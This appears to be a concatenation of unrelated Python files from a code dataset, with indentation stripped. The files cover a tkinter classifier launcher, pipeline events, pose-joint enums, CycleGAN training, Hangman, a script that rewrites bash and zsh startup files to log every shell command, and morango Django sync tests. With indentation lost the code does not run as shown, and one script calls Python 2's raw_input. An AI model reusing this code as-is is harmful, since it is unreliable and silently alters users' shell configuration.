from interactiveWindowLabels import Application
elif args.classifType.lower() == 'tiles':
defaultFeatureList = ['rich residential neighborhood', 'poor residential neighborhood', 'industrial district',
'peri-urban district', 'farm and forest']
from interactiveWindowTiles import Application
elif args.classifType.lower() == 'contours':
defaultFeatureList = ['interesting','not interesting', 'tree', 'factory', 'villa']
from interactiveWindowContours import Application
else:
raise ValueError ("Has to be contours, tiles or labels")
featureListName = f'featureList{args.classifType.capitalize()}.csv'
## Check if feature List file exists, creates it if not
fp = Path(f'{args.datasetPath}/classifiedMaps/{featureListName}')
if not fp.is_file():
with open(fp, 'w', newline='') as csvFile:
fileWriter = csv.writer(csvFile)
for featureName in defaultFeatureList:
fileWriter.writerow([featureName])
root = tk.Tk()
app = Application(root, cityName, datasetPath, classifiedFolderPath)
root.mainloop()
if __name__=='__main__':
main()
|
nilq/baby-python
|
python
|
"""Events that are emitted during pipeline execution"""
import abc
import datetime
import json
import enum
class Event():
def __init__(self) -> None:
"""
Base class for events that are emitted from mara.
"""
def to_json(self):
return json.dumps({field: value.isoformat() if isinstance(value, datetime.datetime) else value
for field, value in self.__dict__.items()})
class EventHandler(abc.ABC):
@abc.abstractmethod
def handle_event(self, event: Event):
pass
class PipelineEvent():
def __init__(self, node_path: [str]) -> None:
"""
Base class for events that are emitted during a pipeline run.
Args:
node_path: The path of the current node in the data pipeline that is run
"""
self.node_path = node_path
def to_json(self):
return json.dumps({field: value.isoformat() if isinstance(value, datetime.datetime) else value
for field, value in self.__dict__.items()})
class RunStarted(PipelineEvent):
def __init__(self, node_path: [str], start_time: datetime.datetime, pid: int) -> None:
"""
A pipeline run started
Args:
node_path: The path of the pipeline that was run
start_time: The time when the run started
pid: The process id of the process that runs the pipeline
"""
super().__init__([])
self.node_path = node_path
self.start_time = start_time
self.pid = pid
class RunFinished(PipelineEvent):
def __init__(self, node_path: [str], end_time: datetime.datetime, succeeded: bool) -> None:
"""
A pipeline run finished
Args:
node_path: The path of the pipeline that was run
end_time: The time when the run finished
succeeded: Whether the run succeeded
"""
super().__init__([])
self.node_path = node_path
self.end_time = end_time
self.succeeded = succeeded
class NodeStarted(PipelineEvent):
def __init__(self, node_path: [str], start_time: datetime.datetime, is_pipeline: bool) -> None:
"""
A task run started.
Args:
node_path: The path of the current node in the data pipeline that is run
start_time: The time when the task started
is_pipeline: Whether the node is a pipeline
"""
super().__init__(node_path)
self.start_time = start_time
self.is_pipeline = is_pipeline
class NodeFinished(PipelineEvent):
def __init__(self, node_path: [str], start_time: datetime.datetime, end_time: datetime.datetime,
is_pipeline: bool, succeeded: bool) -> None:
"""
A run of a task or pipeline finished.
Args:
node_path: The path of the current node in the data pipeline that is run
start_time: The time when the task started
end_time: The time when the task finished
is_pipeline: Whether the node is a pipeline
succeeded: Whether the task succeeded
"""
super().__init__(node_path)
self.start_time = start_time
self.end_time = end_time
self.is_pipeline = is_pipeline
self.succeeded = succeeded
class Output(PipelineEvent):
class Format(enum.EnumMeta):
"""Formats for displaying log messages"""
STANDARD = 'standard'
VERBATIM = 'verbatim'
ITALICS = 'italics'
def __init__(self, node_path: [str], message: str,
format: Format = Format.STANDARD, is_error: bool = False) -> None:
"""
Some text output occurred.
Args:
node_path: The path of the current node in the data pipeline that is run
message: The message to display
format: How to format the message
is_error: Whether the message is considered an error message
"""
super().__init__(node_path)
self.message = message
self.format = format
self.is_error = is_error
self.timestamp = datetime.datetime.now()
|
nilq/baby-python
|
python
|
# An implementation of reference learning for the game TicTacToe
|
nilq/baby-python
|
python
|
from enum import Enum
import numpy as np
class TypeData(Enum):
BODY = 0
HAND = 1
class HandJointType(Enum):
BAMB_0 = 0
BAMB_1 = 1
BIG_TOE = 2
BIG_TOE_1 = 3
BIG_TOE_2 = 4
FINGER_1 = 5
FINGER_1_1 = 6
FINGER_1_2 = 7
FINGER_1_3 = 8
FINGER_2 = 9
FINGER_2_1 = 10
FINGER_2_2 = 11
FINGER_2_3 = 12
FINGER_3 = 13
FINGER_3_1 = 14
FINGER_3_2 = 15
FINGER_3_3 = 16
FINGER_4 = 17
FINGER_4_1 = 18
FINGER_4_2 = 19
FINGER_4_3 = 20
class JointType(Enum):
Nose = 0
Neck = 1
RightShoulder = 2
RightElbow = 3
RightHand = 4
LeftShoulder = 5
LeftElbow = 6
LeftHand = 7
RightWaist = 8
RightKnee = 9
RightFoot = 10
LeftWaist = 11
LeftKnee = 12
LeftFoot = 13
RightEye = 14
LeftEye = 15
RightEar = 16
LeftEar = 17
hand_join_indices = [
HandJointType.BAMB_0,
HandJointType.BAMB_1,
HandJointType.BIG_TOE,
HandJointType.BIG_TOE_1,
HandJointType.BIG_TOE_2,
HandJointType.FINGER_1,
HandJointType.FINGER_1_1,
HandJointType.FINGER_1_2,
HandJointType.FINGER_1_3,
HandJointType.FINGER_2,
HandJointType.FINGER_2_1,
HandJointType.FINGER_2_2,
HandJointType.FINGER_2_3,
HandJointType.FINGER_3,
HandJointType.FINGER_3_1,
HandJointType.FINGER_3_2,
HandJointType.FINGER_3_3,
HandJointType.FINGER_4,
HandJointType.FINGER_4_1,
HandJointType.FINGER_4_2,
HandJointType.FINGER_4_3
]
coco_joint_indices= [
JointType.Nose,
JointType.LeftEye,
JointType.RightEye,
JointType.LeftEar,
JointType.RightEar,
JointType.LeftShoulder,
JointType.RightShoulder,
JointType.LeftElbow,
JointType.RightElbow,
JointType.LeftHand,
JointType.RightHand,
JointType.LeftWaist,
JointType.RightWaist,
JointType.LeftKnee,
JointType.RightKnee,
JointType.LeftFoot,
JointType.RightFoot
]
LIMBS = [[JointType.Neck, JointType.RightWaist],
[JointType.RightWaist, JointType.RightKnee],
[JointType.RightKnee, JointType.RightFoot],
[JointType.Neck, JointType.LeftWaist],
[JointType.LeftWaist, JointType.LeftKnee],
[JointType.LeftKnee, JointType.LeftFoot],
[JointType.Neck, JointType.RightShoulder],
[JointType.RightShoulder, JointType.RightElbow],
[JointType.RightElbow, JointType.RightHand],
[JointType.RightShoulder, JointType.RightEar],
[JointType.Neck, JointType.LeftShoulder],
[JointType.LeftShoulder, JointType.LeftElbow],
[JointType.LeftElbow, JointType.LeftHand],
[JointType.LeftShoulder, JointType.LeftEar],
[JointType.Neck, JointType.Nose],
[JointType.Nose, JointType.RightEye],
[JointType.Nose, JointType.LeftEye],
[JointType.RightEye, JointType.RightEar],
[JointType.LeftEye, JointType.LeftEar]]
HANDLINES = [
[HandJointType.BAMB_0, HandJointType.BAMB_1],
[HandJointType.BAMB_1, HandJointType.BIG_TOE],
[HandJointType.BIG_TOE, HandJointType.BIG_TOE_1],
[HandJointType.BIG_TOE_1, HandJointType.BIG_TOE_2],
[HandJointType.BAMB_0, HandJointType.FINGER_1],
[HandJointType.FINGER_1, HandJointType.FINGER_1_1],
[HandJointType.FINGER_1_1, HandJointType.FINGER_1_2],
[HandJointType.FINGER_1_2, HandJointType.FINGER_1_3],
[HandJointType.BAMB_0, HandJointType.FINGER_2],
[HandJointType.FINGER_2, HandJointType.FINGER_2_1],
[HandJointType.FINGER_2_1, HandJointType.FINGER_2_2],
[HandJointType.FINGER_2_2, HandJointType.FINGER_2_3],
[HandJointType.BAMB_0, HandJointType.FINGER_3],
[HandJointType.FINGER_3, HandJointType.FINGER_3_1],
[HandJointType.FINGER_3_1, HandJointType.FINGER_3_2],
[HandJointType.FINGER_3_2, HandJointType.FINGER_3_3],
[HandJointType.BAMB_0, HandJointType.FINGER_4],
[HandJointType.FINGER_4, HandJointType.FINGER_4_1],
[HandJointType.FINGER_4_1, HandJointType.FINGER_4_2],
[HandJointType.FINGER_4_2, HandJointType.FINGER_4_3],
]
body_edges = np.array(
[[0, 1], # neck - nose
[1, 16], [16, 18], # nose - l_eye - l_ear
[1, 15], [15, 17], # nose - r_eye - r_ear
[0, 3], [3, 4], [4, 5], # neck - l_shoulder - l_elbow - l_wrist
[0, 9], [9, 10], [10, 11], # neck - r_shoulder - r_elbow - r_wrist
[0, 6], [6, 7], [7, 8], # neck - l_hip - l_knee - l_ankle
[0, 12], [12, 13], [13, 14]]) # neck - r_hip - r_knee - r_ankle
hand_edges = [[0, 1],
[1, 2], [2, 3], [3, 4], # nose - l_eye - l_ear
[0, 5], [5, 6],[6, 7],[7, 8], # nose - r_eye - r_ear
[0, 9], [9,10], [10, 11],[11, 12], # neck - l_shoulder - l_elbow - l_wrist
[0, 13], [13, 14], [14, 15],[15, 16], # neck - r_shoulder - r_elbow - r_wrist
[0, 17], [17, 18], [18, 19],[19, 20]] # neck - r_hip - r_knee - r_ankle
|
nilq/baby-python
|
python
|
import tensorflow as tf
import time
import os
import sys
import model_nature as model
base = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(base,'../../'))
import datasets.Img2ImgPipeLine as train_dataset
physical_devices = tf.config.experimental.list_physical_devices(device_type='GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], True)
from tensorflow.keras.mixed_precision import experimental as mixed_precision
policy = mixed_precision.Policy('mixed_float16')
mixed_precision.set_policy(policy)
######################################################################################################
train_path_A = "G:\\Datasets\\Img2Img\\horse2zebra\\trainA"
train_path_B = "G:\\Datasets\\Img2Img\\horse2zebra\\trainB"
test_path_A = "G:\\Datasets\\Img2Img\\horse2zebra\\testA"
test_path_B = "G:\\Datasets\\Img2Img\\horse2zebra\\testB"
tmp_path = "D:/Work/Codes_tmp/2DCycleGAN-mixed-horse2zebra-Vanilla"
out_path = "D:/Work/Codes_tmp/2DCycleGAN-mixed-horse2zebra-Vanilla/out"
if not os.path.exists(tmp_path):
os.makedirs(tmp_path)
if not os.path.exists(out_path):
os.makedirs(out_path)
def map_func(x):
# x shape = [batch,2,256,256,3]
#必须归一化 对应于网络的tanh 但是暂时不知道用什么像素标准去归一化 可能需要遍历所有的值
A = tf.reshape(x[:,0,:,:,:],[1,256,256,3], name=None)
A = (A-0.0)/1
B = tf.reshape(x[:,1,:,:,:],[1,256,256,3], name=None)
B = (B-0.0)/1
return A,B
EPOCHES = 200
BATCH_SIZE = 1
num_threads = 4
dataset = train_dataset.DataPipeLine(train_path_A,train_path_B)
dataset = tf.data.Dataset.from_generator(dataset.generator,output_types=tf.float32)\
.batch(BATCH_SIZE)\
.map(map_func,num_parallel_calls=num_threads)\
.prefetch(buffer_size = tf.data.experimental.AUTOTUNE)
test_set = train_dataset.DataPipeLine(test_path_A,test_path_B)
test_set = tf.data.Dataset.from_generator(test_set.generator,output_types=tf.float32)\
.batch(BATCH_SIZE)\
.map(map_func,num_parallel_calls=num_threads)\
.prefetch(buffer_size = tf.data.experimental.AUTOTUNE)
model = model.CycleGAN(train_set=dataset,
test_set=test_set,
loss_name="Vanilla",
mixed_precision=True,
learning_rate=2e-4,
tmp_path=tmp_path,
out_path=out_path)
model.build(X_shape=[None,256,256,3],Y_shape=[None,256,256,3])
model.train(epoches=EPOCHES)
|
nilq/baby-python
|
python
|
#
# Hangman
# Python Techdegree
#
# Created by Dulio Denis on 2/9/17.
# Copyright (c) 2017 ddApps. All rights reserved.
# ------------------------------------------------
# Guess what word the computer picked.
#
import random
import os
import sys
# make a list of words
words = [
'apple',
'banana',
'orange',
'coconut',
'strawberry',
'lime',
'grapefruit',
'lemon',
'kumquat',
'pineapple',
'blueberry',
'melon'
]
# clear the screen
def clear():
# if windows
if os.name == 'nt':
os.system('cls')
# else its Unix based like macOS and Linux
else:
os.system('clear')
# draw function
def draw(bad_guesses, good_guesses, secret_word):
# clear the screen first
clear()
# and draw the strikes
print('Strikes: {}/7'.format(len(bad_guesses)))
print('') # a blank line just for formatting
# draw the bad guesses
for letter in bad_guesses:
print(letter, end = ' ')
print('\n\n')
# then draw guessed letters
for letter in secret_word:
if letter in good_guesses:
print(letter, end=' ')
else:
print('_', end=' ')
# get the guess
def get_guess(bad_guesses, good_guesses):
while True:
# take a guess and lowercase it right away
guess = input("Guess a letter: ").lower()
# validate its a legitimate guess
if (len(guess)) != 1:
print("You can only guess a single letter")
elif guess in bad_guesses or guess in good_guesses:
print("You've already guessed that letter.")
elif not guess.isalpha():
print("You can only guess letters.")
else:
return guess
# play the game
def play(done):
# clear the screen
clear()
# pick a random word
secret_word = random.choice(words)
# have both a good and bad guess letter list
bad_guesses = []
good_guesses = []
while True:
draw(bad_guesses, good_guesses, secret_word)
guess = get_guess(bad_guesses, good_guesses)
if guess in secret_word:
good_guesses.append(guess)
found = True
for letter in secret_word:
if letter not in good_guesses:
found = False
if found:
print("You win!")
print("The secret word was {}".format(secret_word))
done = True
else:
bad_guesses.append(guess)
if len(bad_guesses) == 7:
draw(bad_guesses, good_guesses, secret_word)
print("You lost!")
print("The secret word was {}".format(secret_word))
done = True
if done:
play_again = input('Play again? Y/n ').lower()
if play_again != 'n':
return play(done=False)
else:
sys.exit()
def welcome():
print('Welcome to Hangman!')
start = input('Press enter/return to start or Q to quit ').lower()
if start == 'q':
print('Thanks for playing.')
sys.exit()
else:
return True
done = False
while True:
clear()
welcome()
play(done)
|
nilq/baby-python
|
python
|
#!/usr/bin/python3
from shutil import copyfile
from shutil import move
from os import remove
from os import environ
import os
import os.path
import sys
import subprocess
homedir = os.environ['HOME']
bash_target_file = homedir + "/.bashrc"
bash_backup_file = homedir + "/.backup-bashrc"
bash_new_file = homedir + "/.newbashrc"
interfaces = []
def get_network_interfaces():
for line in open('/proc/net/dev', 'r'):
if line.find(":") != -1 and line.find("lo") == -1:
interfaces.append(line.split(":")[0].strip())
def modify_bash_terminal_line(selected_interface):
with open(bash_new_file, "w") as newfile:
with open (bash_target_file) as oldfile:
for line in oldfile:
if line.find("PS1") != -1 and not line.strip().startswith("#"):
### This modifies the terminal to show timestamp, IP, and current directory inline
newfile.write("PS1=\'[`date +\"%d-%b-%y %T\"`]\\[\\033[01;31m\\] `ifconfig " + selected_interface + " 2>/dev/null | sed -n 2,2p | cut -d\" \" -f 10`\\[\\033[00m\\] \\[\\033[01;34m\\]\\W\\[\\033[00m\\] > \'" + "\n")
else:
newfile.write(line)
remove(bash_target_file)
move(bash_new_file, bash_target_file)
def add_log_file_creation():
with open(bash_target_file, "a") as f:
### Add a line to the .bashrc file to create a new log file and log all shell commands
f.write("test \"$(ps -ocommand= -p $PPID | awk \'{print $1}\')\" == \'script\' || (script -f $HOME/$(date +\"%d-%b-%y_%H-%M-%S\")_shell.log)")
def zsh_log_file_creation(user):
zsh_filename = "/" + user + "/.zshrc"
with open(zsh_filename, "a") as file:
file.write("precmd() { eval 'RETRN_VAL=$?;logger -p local6.debug \"$(whoami) [$$]: $(history | tail -n1 | sed \"s/^[ ]*[0-9]\+[ ]*//\" ) [$RETRN_VAL]\"' }")
def main():
if ("zsh" in environ['SHELL']):
with open("/etc/rsyslog.d/commands.conf", "w") as commands:
commands.write("local6.* /var/log/commands.log")
result = subprocess.run(["service", "rsyslog restart"], capture_output=True, text=True)
# Make modifications to .zshrc
if os.path.isfile("/root/.zshrc"):
copyfile("/root/.zshrc", "/root/.backup_zshrc") ### make a back-up just in case :)
zsh_log_file_creation("root")
else:
print("Something's wrong... there's no \".zshrc\" file for root!")
if os.path.isfile("/home/kali/.zshrc"):
copyfile("/home/kali/.zshrc", "/home/kali/.backup_zshrc") ### make a back-up just in case :)
zsh_log_file_creation("home/kali")
else:
print("Something's wrong... there's no \".zshrc\" file for kali!")
else:
if os.path.isfile(bash_target_file):
### Figure out what network interfaces are available
selected_interface = None
get_network_interfaces()
### If there is only one interface, don't bother asking the user - just set that
if len(interfaces) != 0 and len(interfaces) == 1:
selected_interface = interfaces[0]
else: ### Otherwise, ask the user to select from the available network interfaces
while selected_interface not in interfaces:
selected_interface = raw_input("Choose your active interface: " + ' '.join(interfaces) + "\n")
copyfile(bash_target_file, bash_backup_file) ### make a back-up of the .bashrc - just in case :)
modify_bash_terminal_line(selected_interface)
add_log_file_creation()
else:
print("Something's wrong... there's no \".bashrc\" file!")
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
import json
import uuid
import factory
import mock
from django.test import TestCase
from facility_profile.models import Facility
from facility_profile.models import MyUser
from facility_profile.models import SummaryLog
from test.support import EnvironmentVarGuard
from .helpers import serialized_facility_factory
from morango.models.certificates import Filter
from morango.models.core import DeletedModels
from morango.models.core import HardDeletedModels
from morango.models.core import InstanceIDModel
from morango.models.core import RecordMaxCounter
from morango.models.core import Store
from morango.sync.controller import _self_referential_fk
from morango.sync.controller import MorangoProfileController
class FacilityModelFactory(factory.DjangoModelFactory):
class Meta:
model = Facility
name = factory.Sequence(lambda n: "Fac %d" % n)
class StoreModelFacilityFactory(factory.DjangoModelFactory):
class Meta:
model = Store
model_name = "facility"
profile = "facilitydata"
last_saved_instance = uuid.uuid4().hex
last_saved_counter = 1
dirty_bit = True
class SerializeIntoStoreTestCase(TestCase):
def setUp(self):
InstanceIDModel.get_or_create_current_instance()
self.range = 10
self.mc = MorangoProfileController("facilitydata")
self.original_name = "ralphie"
self.new_name = "rafael"
def test_all_models_get_serialized(self):
[FacilityModelFactory() for _ in range(self.range)]
self.mc.serialize_into_store()
self.assertEqual(len(Store.objects.all()), self.range)
def test_no_models_get_serialized(self):
# set dirty bit off on new models created
[
FacilityModelFactory.build().save(update_dirty_bit_to=False)
for _ in range(self.range)
]
# only models with dirty bit on should be serialized
self.mc.serialize_into_store()
self.assertFalse(Store.objects.exists())
def test_dirty_bit_gets_set(self):
[FacilityModelFactory() for _ in range(self.range)]
# dirty bit should be on
for facility in Facility.objects.all():
self.assertTrue(facility._morango_dirty_bit)
self.mc.serialize_into_store()
# dirty bit should have been toggled off
for facility in Facility.objects.all():
self.assertFalse(facility._morango_dirty_bit)
def test_store_models_get_updated(self):
FacilityModelFactory(name=self.original_name)
self.mc.serialize_into_store()
store_facility = Store.objects.first()
deserialized_model = json.loads(store_facility.serialized)
self.assertEqual(deserialized_model["name"], self.original_name)
Facility.objects.update(name=self.new_name)
self.mc.serialize_into_store()
store_facility = Store.objects.first()
deserialized_model = json.loads(store_facility.serialized)
self.assertEqual(deserialized_model["name"], self.new_name)
def test_last_saved_counter_updates(self):
FacilityModelFactory(name=self.original_name)
self.mc.serialize_into_store()
old_counter = Store.objects.first().last_saved_counter
Facility.objects.all().update(name=self.new_name)
self.mc.serialize_into_store()
new_counter = Store.objects.first().last_saved_counter
self.assertEqual(old_counter + 1, new_counter)
def test_last_saved_instance_updates(self):
FacilityModelFactory(name=self.original_name)
self.mc.serialize_into_store()
old_instance_id = Store.objects.first().last_saved_instance
with EnvironmentVarGuard() as env:
env['MORANGO_SYSTEM_ID'] = 'new_sys_id'
(new_id, _) = InstanceIDModel.get_or_create_current_instance(clear_cache=True)
Facility.objects.all().update(name=self.new_name)
self.mc.serialize_into_store()
new_instance_id = Store.objects.first().last_saved_instance
self.assertNotEqual(old_instance_id, new_instance_id)
self.assertEqual(new_instance_id, new_id.id)
def test_extra_fields_dont_get_overwritten(self):
serialized = """{"username": "deadbeef", "height": 6.0, "weight": 100}"""
MyUser.objects.create(username="deadbeef")
self.mc.serialize_into_store()
Store.objects.update(serialized=serialized)
MyUser.objects.update(username="alivebeef")
self.mc.serialize_into_store()
serialized = json.loads(Store.objects.first().serialized)
self.assertIn("height", serialized)
def test_updates_store_deleted_flag(self):
fac = FacilityModelFactory()
fac_id = fac.id
self.mc.serialize_into_store()
self.assertFalse(Store.objects.get(pk=fac_id).deleted)
fac.delete()
self.assertTrue(DeletedModels.objects.exists())
self.mc.serialize_into_store()
self.assertFalse(DeletedModels.objects.exists())
self.assertTrue(Store.objects.get(pk=fac_id).deleted)
def test_cascading_delete_updates_store_deleted_flag(self):
fac = FacilityModelFactory()
child = FacilityModelFactory(parent_id=fac.id)
child_id = child.id
self.mc.serialize_into_store()
self.assertFalse(Store.objects.get(pk=child_id).deleted)
fac.delete()
self.mc.serialize_into_store()
self.assertTrue(Store.objects.get(pk=child_id).deleted)
def test_conflicting_data_appended(self):
self.maxDiff = None
serialized = json.dumps({"username": "deadb\neef"})
conflicting = []
user = MyUser.objects.create(username="user")
self.mc.serialize_into_store()
# add serialized fields to conflicting data
conflicting.insert(0, serialized)
conflicting.insert(0, json.dumps(user.serialize()))
# set store record and app record dirty bits to true to force serialization merge conflict
Store.objects.update(conflicting_serialized_data=serialized, dirty_bit=True)
user.username = "user1"
user.save(update_dirty_bit_to=True)
self.mc.serialize_into_store()
# assert we have placed serialized object into store's serialized field
st = Store.objects.get(id=user.id)
self.assertEqual(json.loads(st.serialized), user.serialize())
# assert store serialized field is moved to conflicting data
conflicting_serialized_data = st.conflicting_serialized_data.split("\n")
for x in range(len(conflicting)):
self.assertEqual(conflicting[x], conflicting_serialized_data[x])
def test_filtered_serialization_single_filter(self):
fac = FacilityModelFactory()
user = MyUser.objects.create(username="deadbeef")
log = SummaryLog.objects.create(user=user)
self.mc.serialize_into_store(filter=Filter(user._morango_partition))
self.assertFalse(Store.objects.filter(id=fac.id).exists())
self.assertTrue(Store.objects.filter(id=user.id).exists())
self.assertTrue(Store.objects.filter(id=log.id).exists())
def test_filtered_serialization_multiple_filter(self):
fac = FacilityModelFactory()
user = MyUser.objects.create(username="deadbeef")
user2 = MyUser.objects.create(username="alivebeef")
log = SummaryLog.objects.create(user=user)
self.mc.serialize_into_store(
filter=Filter(user._morango_partition + "\n" + user2._morango_partition)
)
self.assertFalse(Store.objects.filter(id=fac.id).exists())
self.assertTrue(Store.objects.filter(id=user2.id).exists())
self.assertTrue(Store.objects.filter(id=user.id).exists())
self.assertTrue(Store.objects.filter(id=log.id).exists())
def test_self_ref_fk_class_adds_value_to_store(self):
root = FacilityModelFactory()
child = FacilityModelFactory(parent=root)
self.mc.serialize_into_store()
self.assertEqual(Store.objects.get(id=child.id)._self_ref_fk, root.id)
def test_regular_class_leaves_value_blank_in_store(self):
log = SummaryLog.objects.create(user=MyUser.objects.create(username="user"))
self.mc.serialize_into_store()
self.assertEqual(Store.objects.get(id=log.id)._self_ref_fk, "")
def test_previously_deleted_store_flag_resets(self):
# create and delete object
user = MyUser.objects.create(username="user")
user_id = user.id
self.mc.serialize_into_store()
MyUser.objects.all().delete()
self.mc.serialize_into_store()
self.assertTrue(Store.objects.get(id=user_id).deleted)
# recreate object with same id
user = MyUser.objects.create(username="user")
# ensure deleted flag is updated after recreation
self.mc.serialize_into_store()
self.assertFalse(Store.objects.get(id=user_id).deleted)
def test_previously_hard_deleted_store_flag_resets(self):
# create and delete object
user = MyUser.objects.create(username="user")
user_id = user.id
self.mc.serialize_into_store()
user.delete(hard_delete=True)
self.mc.serialize_into_store()
self.assertTrue(Store.objects.get(id=user_id).hard_deleted)
# recreate object with same id
user = MyUser.objects.create(username="user")
# ensure hard deleted flag is updated after recreation
self.mc.serialize_into_store()
self.assertFalse(Store.objects.get(id=user_id).hard_deleted)
def test_hard_delete_wipes_serialized(self):
user = MyUser.objects.create(username="user")
log = SummaryLog.objects.create(user=user)
self.mc.serialize_into_store()
Store.objects.update(conflicting_serialized_data="store")
st = Store.objects.get(id=log.id)
self.assertNotEqual(st.serialized, "")
self.assertNotEqual(st.conflicting_serialized_data, "")
user.delete(hard_delete=True) # cascade hard delete
self.mc.serialize_into_store()
st.refresh_from_db()
self.assertEqual(st.serialized, "{}")
self.assertEqual(st.conflicting_serialized_data, "")
def test_in_app_hard_delete_propagates(self):
user = MyUser.objects.create(username="user")
log_id = uuid.uuid4().hex
log = SummaryLog(user=user, id=log_id)
StoreModelFacilityFactory(
model_name="user", id=user.id, serialized=json.dumps(user.serialize())
)
store_log = StoreModelFacilityFactory(
model_name="contentsummarylog",
id=log.id,
serialized=json.dumps(log.serialize()),
)
user.delete(hard_delete=True)
# preps log to be hard_deleted
self.mc.deserialize_from_store()
# updates store log to be hard_deleted
self.mc.serialize_into_store()
store_log.refresh_from_db()
self.assertTrue(store_log.hard_deleted)
self.assertEqual(store_log.serialized, "{}")
def test_store_hard_delete_propagates(self):
user = MyUser(username="user")
user.save(update_dirty_bit_to=False)
log = SummaryLog(user=user)
log.save(update_dirty_bit_to=False)
StoreModelFacilityFactory(
model_name="user",
id=user.id,
serialized=json.dumps(user.serialize()),
hard_deleted=True,
deleted=True,
)
# make sure hard_deleted propagates to related models even if they are not hard_deleted
self.mc.deserialize_from_store()
self.assertTrue(HardDeletedModels.objects.filter(id=log.id).exists())
class RecordMaxCounterUpdatesDuringSerialization(TestCase):
def setUp(self):
(self.current_id, _) = InstanceIDModel.get_or_create_current_instance()
self.mc = MorangoProfileController("facilitydata")
self.fac1 = FacilityModelFactory(name="school")
self.mc.serialize_into_store()
self.old_rmc = RecordMaxCounter.objects.first()
def test_new_rmc_for_existing_model(self):
with EnvironmentVarGuard() as env:
env['MORANGO_SYSTEM_ID'] = 'new_sys_id'
(new_id, _) = InstanceIDModel.get_or_create_current_instance(clear_cache=True)
Facility.objects.update(name="facility")
self.mc.serialize_into_store()
new_rmc = RecordMaxCounter.objects.get(
instance_id=new_id.id, store_model_id=self.fac1.id
)
new_store_record = Store.objects.get(id=self.fac1.id)
self.assertEqual(new_rmc.counter, new_store_record.last_saved_counter)
self.assertEqual(new_rmc.instance_id, new_store_record.last_saved_instance)
def test_update_rmc_for_existing_model(self):
Facility.objects.update(name="facility")
self.mc.serialize_into_store()
# there should only be 1 RecordMaxCounter for a specific instance_id and a specific model (unique_together)
self.assertEqual(
RecordMaxCounter.objects.filter(
instance_id=self.current_id.id, store_model_id=self.fac1.id
).count(),
1,
)
new_rmc = RecordMaxCounter.objects.get(
instance_id=self.current_id.id, store_model_id=self.fac1.id
)
new_store_record = Store.objects.get(id=self.fac1.id)
self.assertEqual(self.old_rmc.counter + 1, new_rmc.counter)
self.assertEqual(new_rmc.counter, new_store_record.last_saved_counter)
self.assertEqual(new_rmc.instance_id, new_store_record.last_saved_instance)
def test_new_rmc_for_non_existent_model(self):
with EnvironmentVarGuard() as env:
env['MORANGO_SYSTEM_ID'] = 'new_sys_id'
(new_id, _) = InstanceIDModel.get_or_create_current_instance(clear_cache=True)
new_fac = FacilityModelFactory(name="college")
self.mc.serialize_into_store()
new_rmc = RecordMaxCounter.objects.get(
instance_id=new_id.id, store_model_id=new_fac.id
)
new_store_record = Store.objects.get(id=new_fac.id)
self.assertNotEqual(new_id.id, self.current_id.id)
self.assertEqual(new_store_record.last_saved_instance, new_rmc.instance_id)
self.assertEqual(new_store_record.last_saved_counter, new_rmc.counter)
class DeserializationFromStoreIntoAppTestCase(TestCase):
def setUp(self):
(self.current_id, _) = InstanceIDModel.get_or_create_current_instance()
self.range = 10
self.mc = MorangoProfileController("facilitydata")
for i in range(self.range):
self.ident = uuid.uuid4().hex
StoreModelFacilityFactory(
pk=self.ident, serialized=serialized_facility_factory(self.ident)
)
def test_dirty_store_records_are_deserialized(self):
self.assertFalse(Facility.objects.all().exists())
self.mc.deserialize_from_store()
self.assertEqual(len(Facility.objects.all()), self.range)
def test_clean_store_records_do_not_get_deserialized(self):
self.assertFalse(Facility.objects.exists())
Store.objects.update(dirty_bit=False)
self.mc.deserialize_from_store()
self.assertFalse(Facility.objects.exists())
def test_deleted_models_do_not_get_deserialized(self):
Store.objects.update_or_create(defaults={"deleted": True}, id=self.ident)
self.mc.deserialize_from_store()
self.assertFalse(Facility.objects.filter(id=self.ident).exists())
def test_deleted_models_deletes_them_in_app(self):
# put models in app layer
self.mc.deserialize_from_store()
# deleted flag on store should delete model in app layer
Store.objects.update_or_create(
defaults={"deleted": True, "dirty_bit": True}, id=self.ident
)
self.mc.deserialize_from_store()
self.assertFalse(Facility.objects.filter(id=self.ident).exists())
def test_update_app_with_newer_data_from_store(self):
name = "test"
fac = FacilityModelFactory(id=self.ident, name=name)
fac.save(update_dirty_bit_to=False)
self.assertEqual(fac.name, name)
self.mc.deserialize_from_store()
fac = Facility.objects.get(id=self.ident)
self.assertNotEqual(fac.name, name)
def test_handle_extra_field_deserialization(self):
# modify a store record by adding extra serialized field
store_model = Store.objects.get(id=self.ident)
serialized = json.loads(store_model.serialized)
serialized.update({"wacky": True})
store_model.serialized = json.dumps(serialized)
store_model.save()
# deserialize records
self.mc.deserialize_from_store()
# by this point no errors should have occurred but we check list of fields anyways
fac = Facility.objects.get(id=self.ident)
self.assertNotIn("wacky", fac.__dict__)
def test_store_dirty_bit_resets(self):
self.assertTrue(Store.objects.filter(dirty_bit=True))
self.mc.deserialize_from_store()
self.assertFalse(Store.objects.filter(dirty_bit=True))
def test_record_with_dirty_bit_off_doesnt_deserialize(self):
st = Store.objects.first()
st.dirty_bit = False
st.save()
self.mc.deserialize_from_store()
self.assertFalse(Facility.objects.filter(id=st.id).exists())
def test_broken_fk_leaves_store_dirty_bit(self):
serialized = """{"user_id": "40de9a3fded95d7198f200c78e559353", "id": "bd205b5ee5bc42da85925d24c61341a8"}"""
st = StoreModelFacilityFactory(
id=uuid.uuid4().hex, serialized=serialized, model_name="contentsummarylog"
)
self.mc.deserialize_from_store()
st.refresh_from_db()
self.assertTrue(st.dirty_bit)
def test_invalid_model_leaves_store_dirty_bit(self):
user = MyUser(username="a" * 21)
st = StoreModelFacilityFactory(
model_name="user",
id=uuid.uuid4().hex,
serialized=json.dumps(user.serialize()),
)
self.mc.deserialize_from_store()
st.refresh_from_db()
self.assertTrue(st.dirty_bit)
def test_deleted_model_propagates_to_store_record(self):
"""
It could be the case that we have two store records, one that is deleted and the other that has a fk pointing to the deleted record.
When we deserialize, we want to ensure that the record with the fk pointer also gets the deleted flag set, while also not
deserializing the data into a model.
"""
# user will be deleted
user = MyUser(username="user")
user.save(update_dirty_bit_to=False)
# log may be synced in from other device
log = SummaryLog(user_id=user.id)
log.id = log.calculate_uuid()
StoreModelFacilityFactory(
model_name="user",
id=user.id,
serialized=json.dumps(user.serialize()),
deleted=True,
)
StoreModelFacilityFactory(
model_name="contentsummarylog",
id=log.id,
